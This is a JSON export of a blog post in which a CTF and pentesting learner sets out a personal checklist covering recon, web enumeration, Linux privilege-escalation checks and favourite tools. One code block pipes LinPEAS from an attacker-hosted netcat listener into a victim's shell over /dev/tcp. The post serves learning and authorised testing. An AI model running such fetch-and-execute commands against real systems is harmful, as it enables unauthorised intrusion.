{"id":353,"date":"2025-07-29T07:44:43","date_gmt":"2025-07-29T07:44:43","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=353"},"modified":"2025-07-29T07:44:43","modified_gmt":"2025-07-29T07:44:43","slug":"building-my-personal-pentesting-checklist","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=353","title":{"rendered":"Building My Personal Pentesting Checklist"},"content":{"rendered":"\n<p>To create a better workflow during CTFs and pentests, I wanted to build a checklist to bring more <strong>consistency<\/strong> to my process. It also gives me insight into the simple things that are easy to overlook. In this post, I\u2019ll walk through the different phases of my checklist and share some of the thoughts behind it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial recon<\/h2>\n\n\n\n<p>For most CTFs, initial recon is pretty straightforward: we start with an <code>nmap<\/code> scan and investigate based on open ports. But in pentesting (especially in black-box scenarios), we often don\u2019t get much to begin with. That\u2019s why I added a few more steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Gather IP ranges<\/li>\n\n\n\n<li>WHOIS Lookup<\/li>\n\n\n\n<li>DNS enumeration<\/li>\n\n\n\n<li>Google dorking<\/li>\n<\/ul>\n\n\n\n<p>These steps help make sure I don\u2019t miss any publicly available information before diving into the target itself.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Enumerating &amp; Vulnerability scanning<\/h2>\n\n\n\n<p>In a real pentest, <strong>time is limited<\/strong>, so automation becomes important. I\u2019m starting to explore tools like <strong>Nessus<\/strong> and <strong>OpenVAS<\/strong> for this. But since most of my time goes into CTFs, I\u2019ve been mostly doing manual testing \u2014 especially on webapps, which I really enjoy. 
Here are my go-to web enumeration steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Check for <code>robots.txt<\/code> and <code>sitemap.xml<\/code><\/li>\n\n\n\n<li>Use <strong>Gobuster<\/strong> to find hidden subdirectories<\/li>\n\n\n\n<li>Use <strong>ffuf<\/strong> to brute-force subdomains<\/li>\n\n\n\n<li>Inspect page source code and JavaScript<\/li>\n\n\n\n<li>Look for injection points (SQL, XSS, etc.)<\/li>\n\n\n\n<li>Test upload functions<\/li>\n\n\n\n<li>Check for log poisoning opportunities<\/li>\n<\/ul>\n\n\n\n<p>For non-web services (from the <code>nmap<\/code> scan), I often use <a href=\"https:\/\/book.hacktricks.wiki\/en\/index.html\">HackTricks<\/a> as a guide to help me enumerate further and understand common attack paths.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial access<\/h2>\n\n\n\n<p>Once I gain access, things shift \u2014 we look for <strong>privilege escalation paths<\/strong>. On webapps, this can mean trying to reset credentials or exploit functionality. 
On Linux, I split my checks into <strong>global<\/strong> and <strong>user-level<\/strong> steps:<\/p>\n\n\n\n<p><strong>Global checks:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kernel version: <code>uname -a<\/code><\/li>\n\n\n\n<li>Sudo rights: <code>sudo -l<\/code><\/li>\n\n\n\n<li>Check for vulnerable <code>sudo<\/code> versions<\/li>\n\n\n\n<li>Password reuse across users<\/li>\n\n\n\n<li>Cronjobs running as root<\/li>\n\n\n\n<li>World-writable files\/scripts<\/li>\n\n\n\n<li>Run LinPEAS:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-bd472f5235262c18ee8dcd577ede433c\"><code>sudo nc -q 5 -lvnp 80 &lt; linpeas.sh #Host\ncat &lt; \/dev\/tcp\/10.10.10.10\/80 | sh #Victim<\/code><\/pre>\n\n\n\n<p><strong>User-level checks<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Check user group memberships<\/li>\n\n\n\n<li>Look for password reuse<\/li>\n\n\n\n<li>Check environment variables<\/li>\n\n\n\n<li>Look for SSH keys<\/li>\n\n\n\n<li>Check for hidden files<\/li>\n\n\n\n<li>Check SUID binaries:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-ecccb319dd10cba6f0354caf859ad639\"><code>find \/ -perm -4000 -type f 2&gt;\/dev\/null<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Tools that keep coming back<\/h3>\n\n\n\n<p>Certain tools keep proving their value in almost every challenge or test:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Burp Suite \/ ZAP<\/strong> \u2013 for web proxying and testing<\/li>\n\n\n\n<li><strong>Gobuster \/ ffuf<\/strong> \u2013 for brute-force discovery<\/li>\n\n\n\n<li><strong>Hydra<\/strong> \u2013 for login brute-forcing<\/li>\n\n\n\n<li><strong>LinPEAS<\/strong> \u2013 for privilege escalation<\/li>\n\n\n\n<li><strong>John \/ Hashcat<\/strong> \u2013 for password cracking<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Topics I Want to Explore<\/h2>\n\n\n\n<p>As I 
continue to grow, I\u2019ve realized there are still many areas in pentesting I haven\u2019t explored yet. A few that are on my radar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Network pentesting<\/li>\n\n\n\n<li>Security evasion techniques<\/li>\n\n\n\n<li>Automated vulnerability pipelines<\/li>\n\n\n\n<li>Social Engineering &amp; phishing<\/li>\n<\/ul>\n\n\n\n<p>The field is massive \u2014 becoming a true all-rounder may not be realistic quickly, but I believe it\u2019s achievable with consistent progress. One step at a time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">A Note on Active Directory (AD)<\/h3>\n\n\n\n<p>Right now, my checklist is mostly focused on web and Linux environments, simply because that\u2019s where I\u2019ve gained the most hands-on experience through CTFs and internal tests. <strong>But Active Directory is a huge part of real-world pentesting<\/strong>, especially in internal assessments. So even though I don\u2019t have a full workflow for AD yet, it\u2019s an area I\u2019m actively planning to dive into.<\/p>\n\n\n\n<p>Some key topics I want to explore in this space:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Basic AD enumeration (users, groups, shares)<\/li>\n\n\n\n<li>Kerberos attacks (e.g. Kerberoasting, AS-REP roasting)<\/li>\n\n\n\n<li>Pass-the-Hash \/ Pass-the-Ticket<\/li>\n\n\n\n<li>BloodHound &amp; SharpHound analysis<\/li>\n\n\n\n<li>Abuse of misconfigured ACLs<\/li>\n<\/ul>\n\n\n\n<p>I\u2019ll update this post and my GitBook once I\u2019ve built a more complete checklist and gained real practice with these.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What\u2019s next?<\/h2>\n\n\n\n<p>I know many of these items are basic \u2014 and that\u2019s <strong>exactly the point<\/strong>. Basics get skipped more often than you&#8217;d think. Missing them can mean missing the entire attack path. I\u2019ll be sharing my checklist soon, probably in the form of a <strong>GitBook<\/strong> or similar platform. 
I\u2019m also working on collecting my CEH and other study notes in the same place. It&#8217;s a work in progress, but I hope it will help others too. The checklist will grow over time as my experience does. This post is just a snapshot of where I\u2019m at now \u2014 and that\u2019s perfectly fine.<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>To create a better workflow during CTFs and pentests, I wanted to build a checklist to bring more consistency to my process. It also gives me insight into the simple things that are easy to overlook. In this post, I\u2019ll walk through the different phases of my checklist and share some of the thoughts behind [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[7,17],"tags":[],"class_list":["post-353","post","type-post","status-publish","format-standard","hentry","category-realworld","category-tooling"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=353"}],"version-history":[{"count":5,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions"}],"predecessor-version":[{"id":359,"href":"https:\/\/hackingwithj.
com\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions\/359"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}